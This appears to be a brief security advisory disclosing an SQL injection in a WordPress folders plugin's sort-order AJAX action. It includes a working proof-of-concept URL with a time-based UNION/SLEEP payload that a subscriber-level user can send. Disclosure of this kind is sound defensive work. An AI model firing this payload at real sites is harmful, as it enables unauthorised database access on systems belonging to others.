The plugin does not sanitise and escape the folder_id parameter before using it in a SQL statement in the wicked_folders_save_sort_order AJAX action, available to any authenticated user. leading to an SQL injection
As a subscriber: https://example.com/wp-admin/admin-ajax.php?action=wicked_folders_save_sort_order&folder;_id=-1 UNION (SELECT 42,42,42 FROM (SELECT(SLEEP(5)))b)%20–